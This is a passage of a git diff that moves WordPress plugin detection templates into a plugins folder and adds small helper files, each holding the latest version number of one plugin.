technologies/wordpress/{wordpress-happy-elementor-addons.yaml => plugins/happy-elementor-addons.yaml} (86%) rename technologies/wordpress/{wordpress-header-and-footer-scripts.yaml => plugins/header-and-footer-scripts.yaml} (87%) rename technologies/wordpress/{wordpress-header-footer-code-manager.yaml => plugins/header-footer-code-manager.yaml} (86%) rename technologies/wordpress/{wordpress-header-footer-elementor.yaml => plugins/header-footer-elementor.yaml} (85%) rename technologies/wordpress/{wordpress-header-footer.yaml => plugins/header-footer.yaml} (86%) rename technologies/wordpress/{wordpress-health-check.yaml => plugins/health-check.yaml} (86%) rename technologies/wordpress/{wordpress-hello-dolly.yaml => plugins/hello-dolly.yaml} (87%) rename technologies/wordpress/{wordpress-imagify.yaml => plugins/imagify.yaml} (83%) rename technologies/wordpress/{wordpress-imsanity.yaml => plugins/imsanity.yaml} (88%) rename technologies/wordpress/{wordpress-insert-headers-and-footers.yaml => plugins/insert-headers-and-footers.yaml} (82%) rename technologies/wordpress/{wordpress-instagram-feed.yaml => plugins/instagram-feed.yaml} (86%) rename technologies/wordpress/{wordpress-intuitive-custom-post-order.yaml => plugins/intuitive-custom-post-order.yaml} (86%) rename technologies/wordpress/{wordpress-iwp-client.yaml => plugins/iwp-client.yaml} (87%) rename technologies/wordpress/{wordpress-jetpack.yaml => plugins/jetpack.yaml} (85%) rename technologies/wordpress/{wordpress-kadence-blocks.yaml => plugins/kadence-blocks.yaml} (84%) rename technologies/wordpress/{wordpress-kirki.yaml => plugins/kirki.yaml} (87%) rename technologies/wordpress/{wordpress-leadin.yaml => plugins/leadin.yaml} (84%) rename technologies/wordpress/{wordpress-limit-login-attempts-reloaded.yaml => plugins/limit-login-attempts-reloaded.yaml} (86%) rename technologies/wordpress/{wordpress-limit-login-attempts.yaml => plugins/limit-login-attempts.yaml} (86%) rename technologies/wordpress/{wordpress-litespeed-cache.yaml => plugins/litespeed-cache.yaml} (87%) rename technologies/wordpress/{wordpress-loco-translate.yaml => plugins/loco-translate.yaml} (87%) rename technologies/wordpress/{wordpress-loginizer.yaml => plugins/loginizer.yaml} (87%) rename technologies/wordpress/{wordpress-loginpress.yaml => plugins/loginpress.yaml} (86%) rename technologies/wordpress/{wordpress-mailchimp-for-woocommerce.yaml => plugins/mailchimp-for-woocommerce.yaml} (87%) rename technologies/wordpress/{wordpress-mailchimp-for-wp.yaml => plugins/mailchimp-for-wp.yaml} (86%) rename technologies/wordpress/{wordpress-mailpoet.yaml => plugins/mailpoet.yaml} (85%) rename technologies/wordpress/{wordpress-maintenance.yaml => plugins/maintenance.yaml} (87%) rename technologies/wordpress/{wordpress-mainwp-child.yaml => plugins/mainwp-child.yaml} (83%) rename technologies/wordpress/{wordpress-malcare-security.yaml => plugins/malcare-security.yaml} (83%) rename technologies/wordpress/{wordpress-megamenu.yaml => plugins/megamenu.yaml} (88%) rename technologies/wordpress/{wordpress-members.yaml => plugins/members.yaml} (85%) rename technologies/wordpress/{wordpress-meta-box.yaml => plugins/meta-box.yaml} (85%) rename technologies/wordpress/{wordpress-ml-slider.yaml => plugins/ml-slider.yaml} (83%) rename technologies/wordpress/{wordpress-newsletter.yaml => plugins/newsletter.yaml} (85%) rename technologies/wordpress/{wordpress-nextend-facebook-connect.yaml => plugins/nextend-facebook-connect.yaml} (86%) rename technologies/wordpress/{wordpress-nextgen-gallery.yaml => plugins/nextgen-gallery.yaml} (85%) rename technologies/wordpress/{wordpress-ninja-forms.yaml => plugins/ninja-forms.yaml} (83%) rename technologies/wordpress/{wordpress-ocean-extra.yaml => plugins/ocean-extra.yaml} (87%) rename technologies/wordpress/{wordpress-official-facebook-pixel.yaml => plugins/official-facebook-pixel.yaml} (87%) rename technologies/wordpress/{wordpress-one-click-demo-import.yaml => plugins/one-click-demo-import.yaml} (86%) rename technologies/wordpress/{wordpress-optinmonster.yaml => plugins/optinmonster.yaml} (81%) rename technologies/wordpress/{wordpress-password-protected.yaml => plugins/password-protected.yaml} (87%) rename technologies/wordpress/{wordpress-pdf-embedder.yaml => plugins/pdf-embedder.yaml} (88%) rename technologies/wordpress/{wordpress-photo-gallery.yaml => plugins/photo-gallery.yaml} (84%) rename technologies/wordpress/{wordpress-php-compatibility-checker.yaml => plugins/php-compatibility-checker.yaml} (87%) rename technologies/wordpress/{wordpress-pixelyoursite.yaml => plugins/pixelyoursite.yaml} (85%) rename technologies/wordpress/{wordpress-polylang.yaml => plugins/polylang.yaml} (88%) rename technologies/wordpress/{wordpress-popup-builder.yaml => plugins/popup-builder.yaml} (83%) rename technologies/wordpress/{wordpress-popup-maker.yaml => plugins/popup-maker.yaml} (84%) rename technologies/wordpress/{wordpress-post-smtp.yaml => plugins/post-smtp.yaml} (85%) rename technologies/wordpress/{wordpress-post-types-order.yaml => plugins/post-types-order.yaml} (87%) rename technologies/wordpress/{wordpress-premium-addons-for-elementor.yaml => plugins/premium-addons-for-elementor.yaml} (80%) rename technologies/wordpress/{wordpress-pretty-link.yaml => plugins/pretty-link.yaml} (83%) rename technologies/wordpress/{wordpress-really-simple-captcha.yaml => plugins/really-simple-captcha.yaml} (87%) rename technologies/wordpress/{wordpress-really-simple-ssl.yaml => plugins/really-simple-ssl.yaml} (87%) rename technologies/wordpress/{wordpress-redirection.yaml => plugins/redirection.yaml} (87%) rename technologies/wordpress/{wordpress-redux-framework.yaml => plugins/redux-framework.yaml} (84%) rename technologies/wordpress/{wordpress-regenerate-thumbnails.yaml => plugins/regenerate-thumbnails.yaml} (86%) rename technologies/wordpress/{wordpress-safe-svg.yaml => plugins/safe-svg.yaml} (88%) rename technologies/wordpress/{wordpress-seo-by-rank-math.yaml => plugins/seo-by-rank-math.yaml} (87%) rename technologies/wordpress/{wordpress-sg-cachepress.yaml => plugins/sg-cachepress.yaml} (87%) rename technologies/wordpress/{wordpress-sg-security.yaml => plugins/sg-security.yaml} (87%) rename technologies/wordpress/{wordpress-shortcodes-ultimate.yaml => plugins/shortcodes-ultimate.yaml} (84%) rename technologies/wordpress/{wordpress-shortpixel-image-optimiser.yaml => plugins/shortpixel-image-optimiser.yaml} (86%) rename technologies/wordpress/{wordpress-simple-custom-post-order.yaml => plugins/simple-custom-post-order.yaml} (87%) rename technologies/wordpress/{wordpress-simple-page-ordering.yaml => plugins/simple-page-ordering.yaml} (87%) rename technologies/wordpress/{wordpress-siteguard.yaml => plugins/siteguard.yaml} (87%) rename technologies/wordpress/{wordpress-siteorigin-panels.yaml => plugins/siteorigin-panels.yaml} (86%) rename technologies/wordpress/{wordpress-smart-slider-3.yaml => plugins/smart-slider-3.yaml} (87%) rename technologies/wordpress/{wordpress-so-widgets-bundle.yaml => plugins/so-widgets-bundle.yaml} (86%) rename technologies/wordpress/{wordpress-ssl-insecure-content-fixer.yaml => plugins/ssl-insecure-content-fixer.yaml} (86%) rename technologies/wordpress/{wordpress-stops-core-theme-and-plugin-updates.yaml => plugins/stops-core-theme-and-plugin-updates.yaml} (87%) rename technologies/wordpress/{wordpress-sucuri-scanner.yaml => plugins/sucuri-scanner.yaml} (83%) rename technologies/wordpress/{wordpress-svg-support.yaml => plugins/svg-support.yaml} (87%) rename technologies/wordpress/{wordpress-table-of-contents-plus.yaml => plugins/table-of-contents-plus.yaml} (87%) rename technologies/wordpress/{wordpress-tablepress.yaml => plugins/tablepress.yaml} (87%) rename technologies/wordpress/{wordpress-taxonomy-terms-order.yaml => plugins/taxonomy-terms-order.yaml} (86%) rename technologies/wordpress/{wordpress-the-events-calendar.yaml => plugins/the-events-calendar.yaml} (86%) rename technologies/wordpress/{wordpress-themeisle-companion.yaml => plugins/themeisle-companion.yaml} (87%) rename technologies/wordpress/{wordpress-tinymce-advanced.yaml => plugins/tinymce-advanced.yaml} (84%) rename technologies/wordpress/{wordpress-translatepress-multilingual.yaml => plugins/translatepress-multilingual.yaml} (85%) rename technologies/wordpress/{wordpress-ultimate-addons-for-gutenberg.yaml => plugins/ultimate-addons-for-gutenberg.yaml} (86%) rename technologies/wordpress/{wordpress-under-construction-page.yaml => plugins/under-construction-page.yaml} (87%) rename technologies/wordpress/{wordpress-unyson.yaml => plugins/unyson.yaml} (88%) rename technologies/wordpress/{wordpress-updraftplus.yaml => plugins/updraftplus.yaml} (85%) rename technologies/wordpress/{wordpress-use-any-font.yaml => plugins/use-any-font.yaml} (86%) rename technologies/wordpress/{wordpress-user-role-editor.yaml => plugins/user-role-editor.yaml} (87%) rename technologies/wordpress/{wordpress-velvet-blues-update-urls.yaml => plugins/velvet-blues-update-urls.yaml} (87%) rename technologies/wordpress/{wordpress-w3-total-cache.yaml => plugins/w3-total-cache.yaml} (87%) create mode 100644 technologies/wordpress/plugins/webp-converter-for-media.yaml rename technologies/wordpress/{wordpress-widget-importer-exporter.yaml => plugins/widget-importer-exporter.yaml} (86%) rename technologies/wordpress/{wordpress-woo-cart-abandonment-recovery.yaml => plugins/woo-cart-abandonment-recovery.yaml} (86%) rename technologies/wordpress/{wordpress-woo-checkout-field-editor-pro.yaml => plugins/woo-checkout-field-editor-pro.yaml} (84%) rename technologies/wordpress/{wordpress-woo-variation-swatches.yaml => plugins/woo-variation-swatches.yaml} (86%) rename technologies/wordpress/{wordpress-woocommerce-gateway-paypal-express-checkout.yaml => plugins/woocommerce-gateway-paypal-express-checkout.yaml} (85%) rename technologies/wordpress/{wordpress-woocommerce-gateway-stripe.yaml => plugins/woocommerce-gateway-stripe.yaml} (85%) rename technologies/wordpress/{wordpress-woocommerce-payments.yaml => plugins/woocommerce-payments.yaml} (83%) rename technologies/wordpress/{wordpress-woocommerce-paypal-payments.yaml => plugins/woocommerce-paypal-payments.yaml} (86%) rename technologies/wordpress/{wordpress-woocommerce-pdf-invoices-packing-slips.yaml => plugins/woocommerce-pdf-invoices-packing-slips.yaml} (85%) rename technologies/wordpress/{wordpress-woocommerce-services.yaml => plugins/woocommerce-services.yaml} (86%) rename technologies/wordpress/{wordpress-woocommerce.yaml => plugins/woocommerce.yaml} (87%) rename technologies/wordpress/{wordpress-woosidebars.yaml => plugins/woosidebars.yaml} (88%) rename technologies/wordpress/{wordpress-wordfence.yaml => plugins/wordfence.yaml} (85%) rename technologies/wordpress/{wordpress-wordpress-importer.yaml => plugins/wordpress-importer.yaml} (87%) rename technologies/wordpress/{wordpress-wordpress-seo.yaml => plugins/wordpress-seo.yaml} (87%) rename technologies/wordpress/{wordpress-worker.yaml => plugins/worker.yaml} (87%) rename technologies/wordpress/{wordpress-wp-fastest-cache.yaml => plugins/wp-fastest-cache.yaml} (87%) rename technologies/wordpress/{wordpress-wp-file-manager.yaml => plugins/wp-file-manager.yaml} (87%) rename technologies/wordpress/{wordpress-wp-google-maps.yaml => plugins/wp-google-maps.yaml} (86%) rename technologies/wordpress/{wordpress-wp-mail-smtp.yaml => plugins/wp-mail-smtp.yaml} (83%) rename technologies/wordpress/{wordpress-wp-maintenance-mode.yaml => plugins/wp-maintenance-mode.yaml} (83%) rename technologies/wordpress/{wordpress-wp-migrate-db.yaml => plugins/wp-migrate-db.yaml} (85%) rename technologies/wordpress/{wordpress-wp-multibyte-patch.yaml => plugins/wp-multibyte-patch.yaml} (87%) rename technologies/wordpress/{wordpress-wp-optimize.yaml => plugins/wp-optimize.yaml} (85%) rename technologies/wordpress/{wordpress-wp-pagenavi.yaml => plugins/wp-pagenavi.yaml} (87%) rename technologies/wordpress/{wordpress-wp-reset.yaml => plugins/wp-reset.yaml} (85%) rename technologies/wordpress/{wordpress-wp-sitemap-page.yaml => plugins/wp-sitemap-page.yaml} (87%) rename technologies/wordpress/{wordpress-wp-smushit.yaml => plugins/wp-smushit.yaml} (84%) rename technologies/wordpress/{wordpress-wp-statistics.yaml => plugins/wp-statistics.yaml} (88%) rename technologies/wordpress/{wordpress-wp-super-cache.yaml => plugins/wp-super-cache.yaml} (87%) rename technologies/wordpress/{wordpress-wp-user-avatar.yaml => plugins/wp-user-avatar.yaml} (80%) rename technologies/wordpress/{wordpress-wpcf7-recaptcha.yaml => plugins/wpcf7-recaptcha.yaml} (86%) rename technologies/wordpress/{wordpress-wpcf7-redirect.yaml => plugins/wpcf7-redirect.yaml} (86%) rename technologies/wordpress/{wordpress-wpforms-lite.yaml => plugins/wpforms-lite.yaml} (83%) rename technologies/wordpress/{wordpress-wps-hide-login.yaml => plugins/wps-hide-login.yaml} (87%) rename technologies/wordpress/{wordpress-yith-woocommerce-compare.yaml => plugins/yith-woocommerce-compare.yaml} (87%) rename technologies/wordpress/{wordpress-yith-woocommerce-wishlist.yaml => plugins/yith-woocommerce-wishlist.yaml} (86%) delete mode 100644 technologies/wordpress/wordpress-adminimize.txt delete mode 100644 technologies/wordpress/wordpress-advanced-custom-fields.txt delete mode 100644 technologies/wordpress/wordpress-all-in-one-seo-pack.txt delete mode 100644 technologies/wordpress/wordpress-all-in-one-wp-security-and-firewall.txt delete mode 100644 technologies/wordpress/wordpress-astra-sites.txt delete mode 100644 technologies/wordpress/wordpress-click-to-chat-for-whatsapp.txt delete mode 100644 technologies/wordpress/wordpress-coblocks.txt delete mode 100644 technologies/wordpress/wordpress-complianz-gdpr.txt delete mode 100644 technologies/wordpress/wordpress-contact-form-7.txt delete mode 100644 technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt delete mode 100644 technologies/wordpress/wordpress-custom-post-type-ui.txt delete mode 100644 technologies/wordpress/wordpress-disable-comments.txt delete mode 100644 technologies/wordpress/wordpress-easy-fancybox.txt delete mode 100644 technologies/wordpress/wordpress-elementor.txt delete mode 100644 technologies/wordpress/wordpress-elementskit-lite.txt delete mode 100644 technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt delete mode 100644 technologies/wordpress/wordpress-ewww-image-optimizer.txt delete mode 100644 technologies/wordpress/wordpress-facebook-for-woocommerce.txt delete mode 100644 technologies/wordpress/wordpress-formidable.txt delete mode 100644 technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.txt delete mode 100644 technologies/wordpress/wordpress-google-analytics-for-wordpress.txt delete mode 100644 technologies/wordpress/wordpress-google-listings-and-ads.txt delete mode 100644 technologies/wordpress/wordpress-gutenberg.txt delete mode 100644 technologies/wordpress/wordpress-header-footer-code-manager.txt delete mode 100644 technologies/wordpress/wordpress-imagify.txt delete mode 100644 technologies/wordpress/wordpress-insert-headers-and-footers.txt delete mode 100644 technologies/wordpress/wordpress-jetpack.txt delete mode 100644 technologies/wordpress/wordpress-limit-login-attempts-reloaded.txt delete mode 100644 technologies/wordpress/wordpress-litespeed-cache.txt delete mode 100644 technologies/wordpress/wordpress-mailpoet.txt delete mode 100644 technologies/wordpress/wordpress-mainwp-child.txt delete mode 100644 technologies/wordpress/wordpress-meta-box.txt delete mode 100644 technologies/wordpress/wordpress-newsletter.txt delete mode 100644 technologies/wordpress/wordpress-post-duplicator.txt delete mode 100644 technologies/wordpress/wordpress-post-duplicator.yaml delete mode 100644 technologies/wordpress/wordpress-post-smtp.txt delete mode 100644 technologies/wordpress/wordpress-premium-addons-for-elementor.txt delete mode 100644 technologies/wordpress/wordpress-pretty-link.txt delete mode 100644 technologies/wordpress/wordpress-redirection.txt delete mode 100644 technologies/wordpress/wordpress-siteorigin-panels.txt delete mode 100644 technologies/wordpress/wordpress-so-widgets-bundle.txt delete mode 100644 technologies/wordpress/wordpress-sucuri-scanner.txt delete mode 100644 technologies/wordpress/wordpress-svg-support.txt delete mode 100644 technologies/wordpress/wordpress-table-of-contents-plus.txt delete mode 100644 technologies/wordpress/wordpress-the-events-calendar.txt delete mode 100644 technologies/wordpress/wordpress-translatepress-multilingual.txt delete mode 100644 technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt delete mode 100644 technologies/wordpress/wordpress-updraftplus.txt delete mode 100644 technologies/wordpress/wordpress-user-role-editor.txt delete mode 100644 technologies/wordpress/wordpress-w3-total-cache.txt delete mode 100644 technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt delete mode 100644 technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt delete mode 100644 technologies/wordpress/wordpress-woocommerce-paypal-payments.txt delete mode 100644 technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt delete mode 100644 technologies/wordpress/wordpress-woocommerce.txt delete mode 100644 technologies/wordpress/wordpress-wordfence.txt delete mode 100644 technologies/wordpress/wordpress-wordpress-seo.txt delete mode 100644 technologies/wordpress/wordpress-wp-fastest-cache.txt delete mode 100644 technologies/wordpress/wordpress-wp-file-manager.txt delete mode 100644 technologies/wordpress/wordpress-wp-google-maps.txt delete mode 100644 technologies/wordpress/wordpress-wp-mail-smtp.txt delete mode 100644 technologies/wordpress/wordpress-wp-maintenance-mode.txt delete mode 100644 technologies/wordpress/wordpress-wp-optimize.txt delete mode 100644 technologies/wordpress/wordpress-wp-super-cache.txt delete mode 100644 technologies/wordpress/wordpress-wp-user-avatar.txt diff --git a/technologies/wordpress/wordpress-ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt similarity index 100% rename from technologies/wordpress/wordpress-ad-inserter.txt rename to helpers/wordpress/plugins/ad-inserter.txt diff --git a/technologies/wordpress/wordpress-add-to-any.txt b/helpers/wordpress/plugins/add-to-any.txt similarity index 100% rename from technologies/wordpress/wordpress-add-to-any.txt rename to helpers/wordpress/plugins/add-to-any.txt diff --git a/technologies/wordpress/wordpress-admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt similarity index 100% rename from technologies/wordpress/wordpress-admin-menu-editor.txt rename to helpers/wordpress/plugins/admin-menu-editor.txt diff --git a/helpers/wordpress/plugins/adminimize.txt b/helpers/wordpress/plugins/adminimize.txt new file mode 100644 index 0000000000..c8cc623036 --- /dev/null +++ b/helpers/wordpress/plugins/adminimize.txt @@ -0,0 +1 @@ +1.11.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt new file mode 100644 index 0000000000..e873808261 --- /dev/null +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -0,0 +1 @@ +6.0.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-akismet.txt b/helpers/wordpress/plugins/akismet.txt similarity index 100% rename from technologies/wordpress/wordpress-akismet.txt rename to helpers/wordpress/plugins/akismet.txt diff --git a/technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt similarity index 100% rename from technologies/wordpress/wordpress-all-404-redirect-to-homepage.txt rename to helpers/wordpress/plugins/all-404-redirect-to-homepage.txt diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt new file mode 100644 index 0000000000..a22a281799 --- /dev/null +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -0,0 +1 @@ +4.2.8 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt similarity index 100% rename from technologies/wordpress/wordpress-all-in-one-wp-migration.txt rename to helpers/wordpress/plugins/all-in-one-wp-migration.txt diff --git a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt new file mode 100644 index 0000000000..00d9e414cc --- /dev/null +++ b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt @@ -0,0 +1 @@ +5.1.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-amp.txt b/helpers/wordpress/plugins/amp.txt similarity index 100% rename from technologies/wordpress/wordpress-amp.txt rename to helpers/wordpress/plugins/amp.txt diff --git a/technologies/wordpress/wordpress-antispam-bee.txt b/helpers/wordpress/plugins/antispam-bee.txt similarity index 100% rename from technologies/wordpress/wordpress-antispam-bee.txt rename to helpers/wordpress/plugins/antispam-bee.txt diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt new file mode 100644 index 0000000000..7eea2b0feb --- /dev/null +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -0,0 +1 @@ +3.1.20 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-astra-widgets.txt b/helpers/wordpress/plugins/astra-widgets.txt similarity index 100% rename from technologies/wordpress/wordpress-astra-widgets.txt rename to helpers/wordpress/plugins/astra-widgets.txt diff --git a/technologies/wordpress/wordpress-autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt similarity index 100% rename from technologies/wordpress/wordpress-autoptimize.txt rename to helpers/wordpress/plugins/autoptimize.txt diff --git a/technologies/wordpress/wordpress-backwpup.txt b/helpers/wordpress/plugins/backwpup.txt similarity index 100% rename from technologies/wordpress/wordpress-backwpup.txt rename to helpers/wordpress/plugins/backwpup.txt diff --git a/technologies/wordpress/wordpress-better-search-replace.txt b/helpers/wordpress/plugins/better-search-replace.txt similarity index 100% rename from technologies/wordpress/wordpress-better-search-replace.txt rename to helpers/wordpress/plugins/better-search-replace.txt diff --git a/technologies/wordpress/wordpress-better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt similarity index 100% rename from technologies/wordpress/wordpress-better-wp-security.txt rename to helpers/wordpress/plugins/better-wp-security.txt diff --git a/technologies/wordpress/wordpress-black-studio-tinymce-widget.txt b/helpers/wordpress/plugins/black-studio-tinymce-widget.txt similarity index 100% rename from technologies/wordpress/wordpress-black-studio-tinymce-widget.txt rename to helpers/wordpress/plugins/black-studio-tinymce-widget.txt diff --git a/technologies/wordpress/wordpress-breadcrumb-navxt.txt b/helpers/wordpress/plugins/breadcrumb-navxt.txt similarity index 100% rename from technologies/wordpress/wordpress-breadcrumb-navxt.txt rename to helpers/wordpress/plugins/breadcrumb-navxt.txt diff --git a/technologies/wordpress/wordpress-broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt similarity index 100% rename from technologies/wordpress/wordpress-broken-link-checker.txt rename to helpers/wordpress/plugins/broken-link-checker.txt diff --git a/technologies/wordpress/wordpress-child-theme-configurator.txt b/helpers/wordpress/plugins/child-theme-configurator.txt similarity index 100% rename from technologies/wordpress/wordpress-child-theme-configurator.txt rename to helpers/wordpress/plugins/child-theme-configurator.txt diff --git a/technologies/wordpress/wordpress-classic-editor.txt b/helpers/wordpress/plugins/classic-editor.txt similarity index 100% rename from technologies/wordpress/wordpress-classic-editor.txt rename to helpers/wordpress/plugins/classic-editor.txt diff --git a/technologies/wordpress/wordpress-classic-widgets.txt b/helpers/wordpress/plugins/classic-widgets.txt similarity index 100% rename from technologies/wordpress/wordpress-classic-widgets.txt rename to helpers/wordpress/plugins/classic-widgets.txt diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt new file mode 100644 index 0000000000..10724e0b42 --- /dev/null +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -0,0 +1 @@ +3.18.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cloudflare.txt b/helpers/wordpress/plugins/cloudflare.txt similarity index 100% rename from technologies/wordpress/wordpress-cloudflare.txt rename to helpers/wordpress/plugins/cloudflare.txt diff --git a/technologies/wordpress/wordpress-cmb2.txt b/helpers/wordpress/plugins/cmb2.txt similarity index 100% rename from technologies/wordpress/wordpress-cmb2.txt rename to helpers/wordpress/plugins/cmb2.txt diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt new file mode 100644 index 0000000000..fc5c55d0a0 --- /dev/null +++ b/helpers/wordpress/plugins/coblocks.txt @@ -0,0 +1 @@ +2.25.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt similarity index 100% rename from technologies/wordpress/wordpress-code-snippets.txt rename to helpers/wordpress/plugins/code-snippets.txt diff --git a/technologies/wordpress/wordpress-coming-soon.txt b/helpers/wordpress/plugins/coming-soon.txt similarity index 100% rename from technologies/wordpress/wordpress-coming-soon.txt rename to helpers/wordpress/plugins/coming-soon.txt diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt new file mode 100644 index 0000000000..efb9c6b832 --- /dev/null +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -0,0 +1 @@ +6.3.6.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-contact-form-7-honeypot.txt b/helpers/wordpress/plugins/contact-form-7-honeypot.txt similarity index 100% rename from technologies/wordpress/wordpress-contact-form-7-honeypot.txt rename to helpers/wordpress/plugins/contact-form-7-honeypot.txt diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt new file mode 100644 index 0000000000..262122f679 --- /dev/null +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -0,0 +1 @@ +5.7.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-contact-form-cfdb7.txt b/helpers/wordpress/plugins/contact-form-cfdb7.txt similarity index 100% rename from technologies/wordpress/wordpress-contact-form-cfdb7.txt rename to helpers/wordpress/plugins/contact-form-cfdb7.txt diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt new file mode 100644 index 0000000000..3a8b97174c --- /dev/null +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -0,0 +1 @@ +3.0.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-notice.txt b/helpers/wordpress/plugins/cookie-notice.txt new file mode 100644 index 0000000000..ab6d27898c --- /dev/null +++ b/helpers/wordpress/plugins/cookie-notice.txt @@ -0,0 +1 @@ +2.4.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-creame-whatsapp-me.txt b/helpers/wordpress/plugins/creame-whatsapp-me.txt similarity index 100% rename from technologies/wordpress/wordpress-creame-whatsapp-me.txt rename to helpers/wordpress/plugins/creame-whatsapp-me.txt diff --git a/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt b/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt new file mode 100644 index 0000000000..83d1a5ebd8 --- /dev/null +++ b/helpers/wordpress/plugins/creative-mail-by-constant-contact.txt @@ -0,0 +1 @@ +1.6.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-custom-css-js.txt b/helpers/wordpress/plugins/custom-css-js.txt similarity index 100% rename from technologies/wordpress/wordpress-custom-css-js.txt rename to helpers/wordpress/plugins/custom-css-js.txt diff --git a/technologies/wordpress/wordpress-custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt similarity index 100% rename from technologies/wordpress/wordpress-custom-fonts.txt rename to helpers/wordpress/plugins/custom-fonts.txt diff --git a/helpers/wordpress/plugins/custom-post-type-ui.txt b/helpers/wordpress/plugins/custom-post-type-ui.txt new file mode 100644 index 0000000000..d9ee6574b2 --- /dev/null +++ b/helpers/wordpress/plugins/custom-post-type-ui.txt @@ -0,0 +1 @@ +1.13.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-cookie-notice.txt b/helpers/wordpress/plugins/disable-comments.txt similarity index 100% rename from technologies/wordpress/wordpress-cookie-notice.txt rename to helpers/wordpress/plugins/disable-comments.txt diff --git a/technologies/wordpress/wordpress-disable-gutenberg.txt b/helpers/wordpress/plugins/disable-gutenberg.txt similarity index 100% rename from technologies/wordpress/wordpress-disable-gutenberg.txt rename to helpers/wordpress/plugins/disable-gutenberg.txt diff --git a/technologies/wordpress/wordpress-duplicate-page.txt b/helpers/wordpress/plugins/duplicate-page.txt similarity index 100% rename from technologies/wordpress/wordpress-duplicate-page.txt rename to helpers/wordpress/plugins/duplicate-page.txt diff --git a/technologies/wordpress/wordpress-duplicate-post.txt b/helpers/wordpress/plugins/duplicate-post.txt similarity index 100% rename from technologies/wordpress/wordpress-duplicate-post.txt rename to helpers/wordpress/plugins/duplicate-post.txt diff --git a/technologies/wordpress/wordpress-duplicator.txt b/helpers/wordpress/plugins/duplicator.txt similarity index 100% rename from technologies/wordpress/wordpress-duplicator.txt rename to helpers/wordpress/plugins/duplicator.txt diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt b/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt similarity index 100% rename from technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt rename to helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt diff --git a/helpers/wordpress/plugins/easy-fancybox.txt b/helpers/wordpress/plugins/easy-fancybox.txt new file mode 100644 index 0000000000..6ecac68129 --- /dev/null +++ b/helpers/wordpress/plugins/easy-fancybox.txt @@ -0,0 +1 @@ +1.9.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-easy-google-fonts.txt b/helpers/wordpress/plugins/easy-google-fonts.txt similarity index 100% rename from technologies/wordpress/wordpress-easy-google-fonts.txt rename to helpers/wordpress/plugins/easy-google-fonts.txt diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.txt b/helpers/wordpress/plugins/easy-table-of-contents.txt similarity index 100% rename from technologies/wordpress/wordpress-easy-table-of-contents.txt rename to helpers/wordpress/plugins/easy-table-of-contents.txt diff --git a/technologies/wordpress/wordpress-easy-wp-smtp.txt b/helpers/wordpress/plugins/easy-wp-smtp.txt similarity index 100% rename from technologies/wordpress/wordpress-easy-wp-smtp.txt rename to helpers/wordpress/plugins/easy-wp-smtp.txt diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt new file mode 100644 index 0000000000..33f465d1ad --- /dev/null +++ b/helpers/wordpress/plugins/elementor.txt @@ -0,0 +1 @@ +3.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt new file mode 100644 index 0000000000..6533b66871 --- /dev/null +++ 